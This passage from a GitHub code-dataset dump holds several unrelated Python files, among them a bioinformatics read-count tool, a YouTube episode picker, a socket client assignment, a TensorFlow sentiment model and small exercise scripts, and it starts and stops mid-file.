ThirdRowSubTitle = splitingList[1]\r\n ThirdRowCountOfBestHits = splitingList[2]\r\n ThirdRowMeanBitScore = splitingList[3]\r\n \r\n variable_to_hold_spliting_by_backslash = InputCondensedFileName.split(\"\\\\\")\r\n variable_to_hold_size_of_list = len(variable_to_hold_spliting_by_backslash)\r\n pulling_the_last_element = variable_to_hold_spliting_by_backslash [variable_to_hold_size_of_list - 1]\r\n variable_to_hold_Spliting_name_by_underscore = pulling_the_last_element.split(\"_\")\r\n \r\n TargetID = variable_to_hold_Spliting_name_by_underscore[0]\r\n \r\n OutputLineFirstRow = FirstRowSubAcc + \"\\t\" + FirstRowSubTitle + \"\\t\" + FirstRowCountOfBestHits + \"\\t\" + FirstRowMeanBitScore\r\n OutputLineSecondRow = SecondRowSubAcc + \"\\t\" + SecondRowSubTitle + \"\\t\" + SecondRowCountOfBestHits + \"\\t\" + SecondRowMeanBitScore\r\n OutputLineThirdRow = ThirdRowSubAcc + \"\\t\" + ThirdRowSubTitle + \"\\t\" + ThirdRowCountOfBestHits + \"\\t\" + ThirdRowMeanBitScore\r\n\r\n OutputLineAll = TargetID + \"\\t\" + OutputLineFirstRow + \"\\t\" + OutputLineSecondRow + \"\\t\" + OutputLineThirdRow + \"\\n\"\r\n\r\n outputFile.write(OutputLineAll)\r\n \r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])\r\n\r\n\r\n","repo_name":"BTalamantesBecerra/Currito3.1","sub_path":"Currito3.1_cocu.py","file_name":"Currito3.1_cocu.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"30811804105","text":"import random\r\nfrom datetime import datetime\r\nimport json\r\nimport subprocess\r\nimport time\r\nimport urllib.request\r\nimport sqlite3\r\nimport os\r\n\"\"\"\r\n This Program for choosing a Random Episode in Khwater(all_Seasons)\r\n and play it on Youtube (Google chrome)\r\n\"\"\"\r\ndatabase = sqlite3.connect(\"repeated_episodes.db\")\r\nc = database.cursor()\r\n\r\ndef RANDOM():\r\n global Season,Episode\r\n # Get a Random number For both Season & Episode\r\n S = [random.randint(1,12) for item in range(0,12)]\r\n E = [random.randint(1,31) for item in range(0,31)]\r\n #using datetime library to get the current time\r\n now = datetime.now()\r\n date = now.day\r\n day = date\r\n if date >= 12: #To avoid IndexError in case of the date >= 12\r\n if date <= 19:\r\n date = date - 7\r\n else:\r\n date = date - 19\r\n Season = S[date-1]\r\n Episode = E[day-1]\r\n\r\ndef check_if_repeated():\r\n global Season,Episode\r\n RANDOM()\r\n s = Season\r\n e = Episode\r\n c.execute(\"SELECT season,episode FROM data\")\r\n for row in c.fetchall():\r\n if row[0] == Season and row[1] == Episode:\r\n RANDOM()\r\n if Season == s and Episode == e:\r\n c.execute(\"INSERT INTO data (season,episode) VALUES (?,?)\",(s,e))\r\n database.commit()\r\n else:\r\n c.execute(\"INSERT INTO data (season,episode) VALUES (?,?)\",(Season,Episode))\r\n database.commit()\r\n\r\nLinks = {\r\n1:\"PL5EE49DD2D8C38ECE\",\r\n2:\"PLA1D51FAF0DD5845E\",\r\n3:\"PL6C2F3DADE0A1232F\",\r\n4:\"PL467132E986FD1EC9\",\r\n5:\"PL8C23FDC1CB110A08\",\r\n6:\"PL9AF792A465B7FD1D\",\r\n7:\"PLDC04C71919C9A445\",\r\n8:\"PLvKVYdfmki7X6dsNLI88AscMkiAmH8Gjb\",\r\n9:\"PLtQ6jVwjgfV3kJtGgLiQcHjQONJUCZ35I\",\r\n10:\"PLvKVYdfmki7U-vzbMuTEklVotWJF1cUrh\",\r\n11:\"PLvKVYdfmki7XCRIjnidascLtTLwWECEHM\",\r\n12:\"PLjTPwkeuXS8RXFr24Z9kbJM6spnXGxBpS\"\r\n}\r\n\r\ndef getItems(link):\r\n global Season,Episode\r\n apiKey = \"AIzaSyDYRfQ7NkfRh7VjEjmrRPMqiAOaA0wPmx4nOx74Gjhu827Jgspri53B5nb\"\r\n json_format = urllib.request.urlopen(\"https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&playlistId=%s&maxResults=50&key=apiKey\" % link)\r\n json_format_read =json_format.read()\r\n json_format_decode = json_format_read.decode(\"utf-8\")\r\n data = json.loads(json_format_decode)\r\n Vid_Ids = []\r\n for i in data['items']:\r\n Vid_Ids.append(i['snippet']['resourceId']['videoId'])\r\n V_id = Vid_Ids[Episode-1]\r\n Chrome_dist = find(\"chrome.exe\",'C:\\\\')\r\n # subprocess.Popen([r\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\", \"https://www.youtube.com/watch?v=%s\" % V_id ])\r\n subprocess.Popen([\"%s\"% Chrome_dist, \"https://www.youtube.com/watch?v=%s\" % V_id ])\r\n\r\n\r\ndef show():\r\n global Season,Episode\r\n #table()\r\n RANDOM()\r\n check_if_repeated()\r\n if Season == 12:\r\n if Episode > 19 :\r\n Episode = Episode - 12\r\n #print(Season,Episode)\r\n getItems(Links[12])\r\n #print(Season,Episode)\r\n getItems(Links[12])\r\n else:\r\n #print(Season,Episode)\r\n getItems(Links[Season])\r\n\r\ndef find(name, path):\r\n for root, dirs, files in os.walk(path):\r\n if name in files:\r\n return os.path.join(root, name)\r\n\r\n\r\nstarting = time.time()\r\n\r\nshow()\r\nc.close()\r\ndatabase.close()\r\n\r\nending = time.time()\r\nprint(ending - starting)\r\n\r\n#Recourses :\r\n#http://stackoverflow.com/questions/35245246/how-can-you-open-a-url-with-a-specified-web-browser-in-python-3\r\n#http://stackoverflow.com/questions/14858879/split-txt-file-to-multiple-files-named-according-to-their-contents-in-python\r\n","repo_name":"dar4kamal/khawater-series","sub_path":"Khwater_Trials.py","file_name":"Khwater_Trials.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20104474138","text":"import socket\n# from lib.c_parse_document import parse_document, word_parse,output_doc,client\nimport _thread as thread\nimport time\nfrom lib.word_parse import word_parse\nfrom lib.parse_document import parse_document\nfrom lib.tclient import client\nfrom lib.output_doc import output_doc\n\n\n\n# def msg_read(con):\n# data = []\n# msg = con.recv(1024)\n# if not msg: break\n# len = msg\n# for i in range(int(len)):\n# msg = con.recv(1024)\n# data.append([ap.parse(msg)])\n# msg = con.recv(1024)\n# client_key = msg\n\n\ndef listen(c,ap,doc):\n con = c.con\n data = []\n FIM = False\n while True:\n st = con.recv(1024)\n if not st: break\n # print(st)\n\n while st == 'server_request\\n':\n print('Processing a server request')\n msg = con.recv(1024)\n if not msg: break\n len_i = msg\n for i in range(int(len_i)):\n msg = con.recv(1024)\n msg,error = ap.parse(msg)\n if error == 0:\n data.append(msg)\n else:\n data.append('error')\n msg = con.recv(1024)\n client_key = msg\n print('Received a server request to another client (server_key = '+ str(client_key)+') to parse the words.')\n print('Parsed data:')\n print('--------------------------')\n for i in range(int(len_i)):\n print(data[i])\n print('--------------------------')\n con.send('client_response\\n')\n con.send(len_i)\n time.sleep(1/1.5)\n for i in range(int(len_i)):\n con.send(str(data[i]))\n time.sleep(1/1.5)\n con.send(str(client_key))\n st = None\n # print(\"FIM\")\n break\n\n while st == 'server_fresponse\\n':\n print('Received a request answer:')\n print('--------------------------')\n msg = con.recv(1024)\n if not msg: break\n len_sr = msg\n for i in range(int(len_sr)):\n msg = con.recv(1024)\n print(msg)\n doc.write_line(msg)\n print('--------------------------')\n FIM = True\n break\n if FIM == True:\n break\n \n \n\n print('Finalizando conexao do cliente')\n con.close()\n thread.exit()\n\n\n\n\nif __name__ == '__main__':\n doc_msg = parse_document(\"modelo_entrada.txt\")\n print('Open archive named: modelo_entrada.txt.')\n doc_msg.read_lines()\n msg_len = len(doc_msg.dictionary)\n print('Document data parsed.')\n\n ap = word_parse()\n\n HOST = '127.0.0.1' # Endereco IP do Servidor\n PORT = 5001 # Porta que o Servidor esta\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n c = client(tcp,'')\n dest = (HOST, PORT)\n tcp.connect(dest)\n print(\"Send request\\n\")\n doc = output_doc(\"testando.txt\")\n tcp.send(b\"client_request\\n\")\n time.sleep(1/1.5)\n tcp.send((str(msg_len) + '\\n').encode('utf-8'))\n thread.start_new_thread(listen,tuple([c,ap,doc]))\n time.sleep(1/1.5)\n print('Send the following messages:')\n print('--------------------------')\n for i in range(1,msg_len+1): \n time.sleep(1/1.5)\n tcp.send(str(doc_msg.dictionary['k'+str(i)])+ '\\n' )\n print(str(doc_msg.dictionary['k'+str(i)]))\n print('--------------------------')\n\n while True:\n pass\n\n tcp.close()\n","repo_name":"MSathler/TP_redes","sub_path":"python2/client_requestor.py","file_name":"client_requestor.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3670879635","text":"import os\n\nfrom .. import NEXRAD_STATION_ID_LIST\n\ndef nexrad_level2_directory(date, station = NEXRAD_STATION_ID_LIST, root = '/data1/' ):\n \"\"\"\n Name:\n nexrad_level2_directory\n Purpose:\n Return the full paths to the local directories containing NEXRAD\n Level 2 data for the specified date and station IDs\n Inputs:\n date : Datetime for which the directory paths are to be created\n Keywords:\n station : Scalar string or string list containing the station IDs\n for which directories are to be created.\n DEFAULT: directories are created for all of the\n stations in the nexrad.NEXRAD_STATION_ID_LIST\n root : Top-level root directory. Default value depends on the\n date of the data selected\n Returns:\n Returns three values:\n - Scalar string or list of strings containing full path(s) to \n directory(s) of Level 2 files for the date and station(s)\n specified\n - The parent directory of the directories returned in first\n return value. This is the full path to those directories\n without the station ID component\n - The full root directory of Level 2 files for the \n specified date\n \"\"\"\n yyyy = date.strftime( '%Y' )\n yyyymm = date.strftime( '%Y%m' ) \n yyyymmdd = date.strftime( '%Y%m%d' ) \n\n root = os.path.join( root, 'NEXRAD', 'level2' )\n parent = os.path.join(root, yyyy, yyyymm, yyyymmdd, '');\n\n if not isinstance(station, (list, tuple,)): station = [station]; # If station variable is NOT a list or tuple, make it a tuple\n\n return [os.path.join( parent, s, '' ) for s in station], parent, root \n","repo_name":"allendawodu/WeatherRadarML","sub_path":"WeatherRadarML/nexrad/utils/nexrad_level2_directory.py","file_name":"nexrad_level2_directory.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"73719410318","text":"def thesaurus(*args, sort=False) -> dict:\n \"\"\"Формирует словарь, в котором ключи — первые буквы слов,\n а значения — списки, содержащие слова, начинающиеся с соответствующей буквы\n\n :param *args: перечень слов\n :param sort: признак необходимости сортировки словаря по алфавиту (True - сортировать, False - не сортировать)\n :return: словарь слов по первым буквам\"\"\"\n\n if sort:\n args = sorted(list(args)) # Changed in version 3.7: Dictionary order is guaranteed to be insertion order\n\n dict_out = {}\n for word in args:\n dict_value = dict_out.setdefault(word[0], list())\n if word not in dict_value:\n dict_value.append(word)\n dict_out[word[0]] = dict_value\n\n return dict_out\n\n\nprint(thesaurus(\"Иван\", \"Мария\", \"Петр\", \"Илья\"))\n","repo_name":"Zalotny/GB_Python_Basics_Course","sub_path":"Manzhula_Oleg_dz_3/task_3_3.py","file_name":"task_3_3.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22925802633","text":"\nimport json\nimport requests\nimport time\nimport threading\nimport os\nimport people_counter\n\nclass Quick(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.stop_thread= False\n self.counter = people_counter.PeopleCount(\"prototxt.prototxt\", \"model.caffemodel\", 0.4, 30)\n self.currentDiff = 0\n if(os.path.isfile(\"config.txt\")):\n print(\"Config file found, loading from file..\")\n config = json.load(open(\"config.txt\", \"r\"))\n config = config[0] #json is in array, get first array\n self.idPlace = config['idPlace']\n print(\"Place id is: \" +self.idPlace)\n else:\n print(\"Creating new config..\")\n file = open(\"config.txt\", 'w')\n self.idPlace = raw_input(\"Enter id of place: \")\n config = []\n config.append({'idPlace' : self.idPlace})\n json.dump(config, file)\n\n def run(self):\n self.counter.start()\n self.startUpdater()\n\n def stop(self):\n self.stop_thread = True\n self.counter.stop()\n\n def startUpdater(self):\n while not self.stop_thread:\n time.sleep(10)\n self.currentDiff = self.counter.getIn() - self.counter.getOut()\n self.counter.resetInOut()\n params = {'valueToAdd':self.currentDiff,'placeId':self.idPlace}\n print(self.makeRequest(params))\n\n def makeRequest(self, params):\n httpRequest = requests.post('https://aesuneus.000webhostapp.com/qservice.php', params)\n return httpRequest\n","repo_name":"zarifulradzuan/quick-pi","sub_path":"qclass.py","file_name":"qclass.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"69854650638","text":"# -*- encoding: utf-8 -*-\n'''\n@File : 剑指 Offer 58 - I. 翻转单词顺序.py\n@Time : 2022/05/15 00:30:21\n@Author : henfy\n@Diffi : Easy\n@Method : 双指针\n\n题目:https://leetcode.cn/problems/fan-zhuan-dan-ci-shun-xu-lcof/\n'''\n\n\nclass Solution:\n def reverseWords(self, s: str) -> str:\n # 双指针\n # s = s.strip() # 删除首尾空格\n # # print(s)\n # i = j = len(s)-1\n # res = []\n # while i >= 0:\n # while i >= 0 and s[i] != ' ':\n # i -= 1\n # res.append(s[i+1: j+1])\n # while s[i] == ' ':\n # i -= 1\n # j = i\n # return ' '.join(res)\n\n # 分割 + 倒序\n s = s.strip() # 删除首尾空格\n strs = s.split() # 分割字符串\n strs.reverse() # 翻转单词列表\n return ' '.join(strs) # 拼接为字符串并返回\n\n\nif __name__ == '__main__':\n s = Solution()\n test_list = [\n (\"the sky is blue\", \"blue is sky the\"),\n (\" hello world! \", \"world! hello\"),\n (\"a good example\", \"example good a\")\n ]\n\n for test_index, test_case in enumerate(test_list, start=1):\n *test, result = test_case\n test_result = s.reverseWords(*test)\n if test_result != result:\n raise ValueError(\"\\n testcase %d error:\\n expect: %s \\n actually %s\" % (\n test_index, result, test_result))\n print(\"test_case %d succeed.\" % test_index)\n","repo_name":"henfy233/leetcode","sub_path":"剑指Offer/剑指 Offer 58 - I. 翻转单词顺序.py","file_name":"剑指 Offer 58 - I. 翻转单词顺序.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35378611563","text":"# -*- coding: utf-8 -*-\n\"\"\"ribocount\"\"\"\nimport os\nimport shutil\nimport zipfile\nimport logging\nimport argparse\n\nimport ribocore\nimport config\n\n# Default is production\nCONFIG = config.ProductionConfig()\n\nlog = logging.getLogger('riboplot')\n\n\nclass ErrorLogFormatter(logging.Formatter):\n \"\"\"Custom error log format for the HTML file\"\"\"\n\n def format(self, record):\n return '

    RiboCount Error

    {}

    '.format(record.msg)\n\n\ndef create_parser():\n \"\"\"Argument parser. \"\"\"\n parser = argparse.ArgumentParser(\n prog='ribocount.py', description='Output read counts for all transcripts')\n\n # required arguments\n required = parser.add_argument_group('required arguments')\n required.add_argument('-b', '--ribo_file', help='Ribo-Seq alignment file in BAM format', required=True)\n required.add_argument('-f', '--transcriptome_fasta', help='FASTA format file of the transcriptome', required=True)\n\n # optional arguments\n parser.add_argument('-l', '--read_lengths', help='Read lengths to consider (default: %(default)s). '\n 'Multiple read lengths should be separated by commas. If multiple read lengths '\n 'are specified, corresponding read offsets should also be specified. If you do '\n 'not wish to apply an offset, please input 0 for the corresponding read length',\n default='0', type=ribocore.lengths_offsets)\n parser.add_argument('-s', '--read_offsets', help='Read offsets (default: %(default)s). '\n 'Multiple read offsets should be separated by commas',\n default='0', type=ribocore.lengths_offsets)\n\n count_group = parser.add_mutually_exclusive_group()\n count_group.add_argument('-v', '--count_five', help='Flag. Output reads in 5\\' region', action='store_true')\n count_group.add_argument('-r', '--count_three', help='Flag. Output reads in 3\\' region', action='store_true')\n parser.add_argument('-m', '--html_file', help='Output file for results (HTML)', default='ribocount.html')\n parser.add_argument('-o', '--output_path', help='Files are saved in this directory', default='output')\n parser.add_argument('-d', '--debug', help='Flag. Produce debug output', action='store_true')\n\n return parser\n\n\ndef main(args):\n \"\"\"Main program\"\"\"\n (ribo_file, transcriptome_fasta, read_lengths, read_offsets, count_five, count_three,\n output_path, html_file) = \\\n (args.ribo_file, args.transcriptome_fasta, args.read_lengths, args.read_offsets,\n args.count_five, args.count_three, args.output_path, args.html_file)\n\n log.debug('Supplied arguments\\n{}'.format(\n '\\n'.join(['{:<20}: {}'.format(k, v) for k, v in vars(args).items()])))\n\n # error messages (simple format) are written to html file\n fh = logging.FileHandler(html_file)\n fh.setLevel(logging.ERROR)\n fh.setFormatter(ErrorLogFormatter('%(message)s'))\n log.addHandler(fh)\n\n log.info('Checking if required arguments are valid...')\n ribocore.check_required_arguments(ribo_file=ribo_file, transcriptome_fasta=transcriptome_fasta)\n\n log.info('Checking read lengths...')\n ribocore.check_read_lengths(ribo_file=ribo_file, read_lengths=read_lengths)\n log.info('Done')\n\n log.info('Checking read offsets...')\n ribocore.check_read_offsets(read_offsets=read_offsets)\n log.info('Done')\n\n log.info('Checking if each read length has a corresponding offset...')\n ribocore.check_read_lengths_offsets(read_lengths=read_lengths, read_offsets=read_offsets)\n log.info('Done')\n\n with ribocore.open_pysam_file(fname=ribo_file, ftype='bam') as b, ribocore.open_pysam_file(fname=transcriptome_fasta, ftype='fasta') as f:\n # Total valid transcript count (ones with reads)\n count = 0\n prime = None\n table_body = '' # HTML table body content\n if count_five:\n log.info('Only 5\\' read counts requested')\n prime = '5'\n elif count_three:\n log.info('Only 3\\' read counts requested')\n prime = '3'\n\n # create output directories\n if not os.path.exists(output_path):\n os.mkdir(output_path)\n\n # zip_dir contents will be written here and a zip archive will be created\n # from this directory\n zip_dir = os.path.join(output_path, 'ribocount_output')\n if not os.path.exists(zip_dir):\n os.mkdir(zip_dir)\n\n csv_dir = os.path.join(zip_dir, 'csv')\n if not os.path.exists(csv_dir):\n os.mkdir(csv_dir)\n\n log.info('Get RiboSeq read counts for all transcripts in FASTA')\n for transcript in f.references:\n ribo_counts, ribo_reads = ribocore.get_ribo_counts(ribo_fileobj=b, transcript_name=transcript,\n read_lengths=read_lengths, read_offsets=read_offsets)\n if not ribo_reads: # no reads for this transcript. skip.\n continue\n\n transcript_sequence = f[transcript]\n # By default, all counts will be written (ribo_counts)\n # If 5' or 3' counts requested, filter and use\n # those counts for printing instead\n write_counts = ribo_counts\n log.debug('Total read counts {}'.format(ribo_reads))\n\n # find longest ORF and filter counts based on whether 5' or 3' is\n # requested\n longest_orf = {}\n if count_five or count_three:\n # use default start and stop codons and find ORFs in all 3\n # frames (+)\n orfs = ribocore.get_three_frame_orfs(sequence=transcript_sequence)\n if not len(orfs):\n log.debug('No ORFs for transcript {0}'.format(transcript))\n continue\n longest_orf = ribocore.get_longest_orf(orfs=orfs)\n orf_start, orf_stop = longest_orf['start'], longest_orf['stop']\n log.info('Transcript: {0} Longest ORF Start: {1}, Stop: {2}'.format(transcript, orf_start, orf_stop))\n\n if count_five:\n write_counts, five_reads = ribocore.filter_ribo_counts(counts=ribo_counts, orf_start=orf_start)\n log.debug('5\\' region read counts: {}'.format(five_reads))\n elif count_three:\n write_counts, three_reads = ribocore.filter_ribo_counts(counts=ribo_counts, orf_stop=orf_stop)\n log.debug('3\\' region read counts: {}'.format(three_reads))\n\n if not len(write_counts):\n # no counts for transcript\n continue\n\n log.debug('Writing counts to CSV file for transcript {}'.format(transcript))\n count += 1\n csv_file = 'RiboCounts{}.csv'.format(count)\n with open(os.path.join(csv_dir, csv_file), 'w') as cw:\n cw.write('\"Position\",\"Nucleotide\",\"Frame 1\",\"Frame 2\",\"Frame 3\"\\n')\n for pos in range(1, len(transcript_sequence) + 1):\n nucleotide = transcript_sequence[pos - 1]\n if pos in write_counts:\n cw.write('{0},{1},{2},{3},{4}\\n'.format(\n pos, nucleotide, write_counts[pos][1], write_counts[pos][2], write_counts[pos][3]))\n else:\n cw.write('{0},{1},{2},{3},{4}\\n'.format(pos, nucleotide, 0, 0, 0))\n # HTML table\n table_body += '{0}{1}'.format(transcript, ribo_reads)\n if count_five:\n table_body += '{0}'.format(five_reads)\n elif count_three:\n table_body += '{0}'.format(three_reads)\n table_body += '{0}'.format(csv_file)\n table_body += ''\n\n # only for display in HTML\n valid_lengths = ['{}'.format(item) for item in read_lengths]\n if len(valid_lengths) == 1 and valid_lengths[0] == '0':\n valid_lengths = ['All']\n\n if not count:\n if len(valid_lengths) >= 1:\n log.info('No transcripts found for read lengths: {}'.format(', '.join(valid_lengths)))\n else:\n log.info('No transcripts found')\n else:\n if prime:\n template = 'ribocount_prime.html'\n else:\n template = 'ribocount.html'\n with open(os.path.join(CONFIG.PKG_DATA_DIR, template)) as g,\\\n open(os.path.join(zip_dir, 'index.html'), 'w') as h:\n h.write(g.read().format(count=count, length='{}'.format(', '.join(valid_lengths)),\n prime=prime, table_body=table_body))\n\n for asset in ('css', 'js'):\n asset_dir = os.path.join(zip_dir, asset)\n if not os.path.exists(asset_dir):\n os.mkdir(asset_dir)\n asset_data_dir = os.path.join(CONFIG.PKG_DATA_DIR, asset)\n for fname in os.listdir(asset_data_dir):\n shutil.copy(os.path.join(asset_data_dir, fname),\n os.path.join(zip_dir, asset, fname))\n\n log.info('Creating zip file')\n os.chdir(output_path)\n with zipfile.ZipFile('ribocount_output.zip', 'w', allowZip64=True) as zipf:\n for root, d, f in os.walk('ribocount_output'):\n for name in f:\n zipf.write(os.path.join(root, name))\n shutil.rmtree('ribocount_output')\n os.chdir('../')\n log.debug('Writing HTML report')\n\n with open(os.path.join(CONFIG.PKG_DATA_DIR, 'ribocount_index.html')) as j, open(args.html_file, 'w') as k:\n k.write(j.read().format(count=count, read_length=', '.join(valid_lengths)))\n log.info('Finished')\n\n\ndef run():\n \"\"\"Run program\"\"\"\n parsed = create_parser()\n args = parsed.parse_args()\n main(args)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"vimalkvn/riboplot","sub_path":"riboplot/ribocount.py","file_name":"ribocount.py","file_ext":"py","file_size_in_byte":9902,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"20008772086","text":"import requests\n\nBASE_URL = \"http://127.0.0.1:5000/\"\n'''\ndata = [{\"likes\": 10, \"name\":\"Tim\", \"views\": 100},\n {\"likes\": 210, \"name\":\"Joe\", \"views\": 10220},\n {\"likes\": 34, \"name\":\"Brian\", \"views\": 1003},\n {\"likes\": 12, \"name\":\"Karen\", \"views\": 10410},\n {\"likes\": 12424, \"name\":\"How to make REST APIs\", \"views\": 1051160}]\n\nfor i in range(len(data)):\n response = requests.put(BASE_URL + \"video/\" + str(i), data[i])\n print(response.json())\n\n\ninput()\nresponse = requests.get(BASE_URL + 'video/6')\nprint(response.json())\n'''\n\nresponse = requests.patch(BASE_URL+\"video/2\", {\"views\": 99, \"likes\": 1})\nprint(response.json())","repo_name":"JoaoFula/RestAPI","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4960678055","text":"import tensorflow_datasets as tfds\nimport tensorflow as tf\nfrom utils import Vocablury\nimport utils\nimport datetime\nimport os\nimport numpy as np\n\n\nclass SentimentAnalyzer(object):\n def __init__(self,\n # embedding_dim: int = 100,\n rnn_unit: int = 128):\n super().__init__()\n self.vocab = Vocablury(\n load_prefix=\"sherlock\")\n self.model = tf.keras.Sequential([\n tf.keras.layers.Embedding(\n input_dim=len(self.vocab),\n output_dim=rnn_unit,\n mask_zero=True\n # output_dim=embedding_dim\n ),\n tf.keras.layers.Bidirectional(\n tf.keras.layers.LSTM(units=rnn_unit, return_sequences=True)\n ),\n tf.keras.layers.Bidirectional(\n tf.keras.layers.LSTM(units=rnn_unit)\n ),\n tf.keras.layers.Dense(units=rnn_unit, activation=\"relu\"),\n tf.keras.layers.Dropout(rate=0.5),\n tf.keras.layers.Dense(units=1)\n ])\n\n def prepare_dataset(self):\n builder = tfds.builder(\"imdb_reviews\")\n\n builder.download_and_prepare()\n datasets = builder.as_dataset()\n\n self.train: tf.data.Dataset = datasets[\"train\"]\n self.test: tf.data.Dataset = datasets[\"test\"]\n\n def prepare_for_training(self,\n training_size: int = 80000,\n batch_size: int = 64,\n buffer_size: int = 10000\n ):\n # convert to indexes\n # for x in self.train.take(1):\n # print(x)\n self.training = self.train.map(utils.sentence_spliter_map_fn)\n self.training = self.training.flat_map(\n lambda text_list, label_list: tf.data.Dataset.zip(\n (\n tf.data.Dataset.from_tensor_slices(text_list),\n tf.data.Dataset.from_tensor_slices(label_list)\n )\n )\n )\n self.training = self.training.shuffle(buffer_size=buffer_size)\n\n for x, y in self.training.take(20):\n print(x)\n print(y)\n print()\n self.training = self.training.map(self.vocab.encode_map_fn)\n\n # size = self.training.reduce(np.int64(0), lambda x, _: x+1).numpy()\n # print(size, flush=True)\n # shuffle the dataset\n\n # split training,validation\n self.validation = self.training.skip(training_size)\n self.training = self.training.take(training_size)\n\n # # batching\n # # self.training = self.__batching__(self.training, batch_size=batch_size)\n # # self.validation = self.__batching__(\n # # self.validation, batch_size=batch_size)\n\n self.training = self.training.padded_batch(\n batch_size=batch_size, drop_remainder=True)\n self.validation = self.validation.padded_batch(\n batch_size=batch_size, drop_remainder=True)\n\n def __call__(self, text):\n encoded_text = self.vocab.encode(tf.constant(text))\n return self.model(tf.expand_dims(encoded_text, 0))\n\n def train_model(self, epochs: int = 10):\n log_dir = \"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\n\n bce = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\n self.model.compile(optimizer=tf.keras.optimizers.Adam(1e-4),\n loss=bce,\n metrics=[\"accuracy\"])\n print(self.model.summary())\n\n # Directory where the checkpoints will be saved\n checkpoint_dir = \"./model/training_checkpoints\"\n # Name of the checkpoint files\n checkpoint_prefix = os.path.join(checkpoint_dir, \"ckpt_{epoch}\")\n\n checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_prefix,\n save_weights_only=True)\n\n history = self.model.fit(self.training,\n epochs=epochs,\n callbacks=[\n checkpoint_callback, tensorboard_callback],\n validation_data=self.validation)\n\n def load(self, path_to_model: str = \"./model/training_checkpoints\"):\n self.model.load_weights(\"./model/training_checkpoints/ckpt_10\")\n # self.model.load_weights(tf.train.latest_checkpoint(path_to_model))\n","repo_name":"sageprogrammer/imdb-reviews-test","sub_path":"SentimentAnalyzer.py","file_name":"SentimentAnalyzer.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6349309781","text":"menu_item = 0\r\nnamebarang =[]\r\nwhile menu_item != 8 :\r\n print(\".....\")\r\n print(\"1. mencetak list\")\r\n print(\"2. menambahkan nama barang ke dlam list\")\r\n print(\"3. menghapus nama barang dalam list\")\r\n print(\"4. mengubah nama barang dalam list\")\r\n print(\"5. menampilkan data dalam list\")\r\n print(\"6. memeriksa data dalam list\")\r\n print(\"7. mencari index\")\r\n print(\"8. keluar\")\r\n menu_item = int(input(\"pilih menu:\"))\r\n if menu_item == 1 :\r\n barang = 0\r\n if len (namebarang) > 0 :\r\n while barang < len(namebarang[barang]):\r\n print(barang,\".\",namebarang[barang])\r\n barang =barang = 1\r\n else :\r\n print(\"kosong:\")\r\n elif menu_item == 2 :\r\n name = input(\"masukkan nama :\")\r\n namebarang.append(name)\r\n print(namebarang)\r\n elif menu_item == 3 :\r\n del_name = input(\"nama barang yang ingin dihapus :\")\r\n if del_name in namebarang :\r\n item_number = namebarang.index(del_name)\r\n del namebarang[item_number]\r\n print(namebarang)\r\n else :\r\n print(del_name,\"tidak ditemukan\")\r\n elif menu_item == 4 :\r\n name = input(\"nama barang yang ingin di ubah :\")\r\n if name in namebarang :\r\n item_number = namebarang.index(name)\r\n new_name = input(\"nama baru :\")\r\n namebarang[item_number]= new_name\r\n print(namebarang)\r\n else :\r\n print(name,\"tidak ditemukan\")\r\n elif menu_item == 5 :\r\n print(namebarang)\r\n elif menu_item == 6 :\r\n barang_yang_dicari = input(\"masukkan barang yang dicari :\")\r\n if barang_yang_dicari in namebarang :\r\n print(\"barang ini terdapat pada namebarang\")\r\n elif barang_yang_dicari not in namebarang :\r\n print(\"barang ini tidak terdapat pada namebarang\")\r\n elif menu_item == 7 :\r\n print(namebarang)\r\n barang_yang_dicari = input(\"masukkan barang dicari:\")\r\n print(barang_yang_dicari, \"berada pada index\",(barang_yang_dicari))\r\n\r\nprint(\"selamat tinggal\")\r\n \r\n","repo_name":"idamusdalifah/G_D0221358_IDA_MUSDALIFAH_ASD","sub_path":"kasus list ida musdalifah.py","file_name":"kasus list ida musdalifah.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39478486458","text":"import os\nimport sys\nimport glob\nimport webbrowser\nimport unittest\nimport PyQt5.Qt as Qt\nimport PyQt5.QtGui as QtGui\nfrom PyQt5.QtWidgets import QApplication\nimport test.HTMLTestRunner\nimport test.ui.frmTreeViewUITest as frmTreeViewUITest\n\n\nclass UserInterfaceTest(unittest.TestCase):\n def __init__(self):\n unittest.TestCase.__init__(self)\n self.file = \"\"\n\n def set_file(self, file_name):\n self.file = file_name\n # self.__name__ = file_name\n\n def get_file(self):\n return self.file\n\n def 